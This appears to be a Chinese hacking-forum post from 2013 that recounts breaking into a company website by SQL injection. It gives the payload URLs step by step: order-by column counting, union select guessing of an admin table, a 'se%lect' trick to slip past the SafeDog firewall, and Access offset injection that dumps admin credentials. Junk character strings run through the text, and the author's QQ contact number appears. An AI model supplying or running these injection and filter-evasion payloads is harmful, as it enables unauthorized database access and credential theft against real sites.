打开网站,一个企业站。
, g8 u: g0 a3 Z* I* s/ Y. D. {1 F1 N: B
# `' E5 y& c! F5 Q顺手加个admin
: O) R# O$ O0 ~' v5 [+ e/ m8 g' N) S& {, ?4 v/ v" y
- e) T( T* o e1 _" i默认后台。
" B, P# d6 m5 G9 }& J$ H8 P回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
( O$ ?* S3 Z X& b6 _$ H! q2 i- O9 t# @5 t% ^% |+ m+ [4 L. v* o
! Y) x6 ]) g; q8 a
# ~/ D+ z! Q/ k+ Q8 i& B! ~5 C1 F7 H所以就不用御剑扫了,待会直接封IP。% n* `1 E3 _0 w Z
9 ] t- _% R0 e/ w
用order by语句判断是否存在注入。
9 j0 Z& p4 f8 |, i: @http://www.xxx.com /product_show.asp?id=997 order by 1
5 a A' y+ @9 h! l/ V& ?http://www.xxx.com /product_show.asp?id=997 order by 100* n/ E( d% Q/ |+ K. R: |
现在存在注入,经测试后发现是9个字段。
4 M/ ^) B/ j. n' |9 G4 _ 3 B% U+ [2 w$ E3 S+ H8 g- @" _
接下来进行联合查询,猜是否存在admin表。
1 ]0 \) ^9 ?) K! I! ]: ahttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
- Z. O" k+ N. U. B/ ?9 v- a
: f7 d: k6 i* e, g" p! N
! p2 ^2 ~0 y. j: \! n. W( ^% s \3 O
在select中间加个%,se%lect绕过安全狗。+ k k( g, n* q+ J$ w
8 s, @ X: Z7 ?5 L4 R, N
0 [# |2 F3 {5 W6 F5 p发现存在admin表,然后开始手工猜常用的字段。
9 \2 b: h. j; u5 A纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。4 U/ L& o i4 @
3 G3 L; C& |6 T6 l
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。7 x: {8 ~2 k2 ]. Y, `
: J! L6 G2 w$ X z- G1 ^. ?
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
* p ~2 E3 ~$ f+ w& p# m% Qhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
, J! ]6 z. m5 L( D5 |% t好了,敏感内容出显了。7 N7 ?! m& q5 Q% ?& {& A
' T/ h+ ]) ?; z$ l8 u9 B5 j
s- c" J4 g' F) { [* q& x
- t* j& ]8 r& `1 B1 H( Z* Y |
发表于 2013-3-8 21:49:45
收藏
支持
反对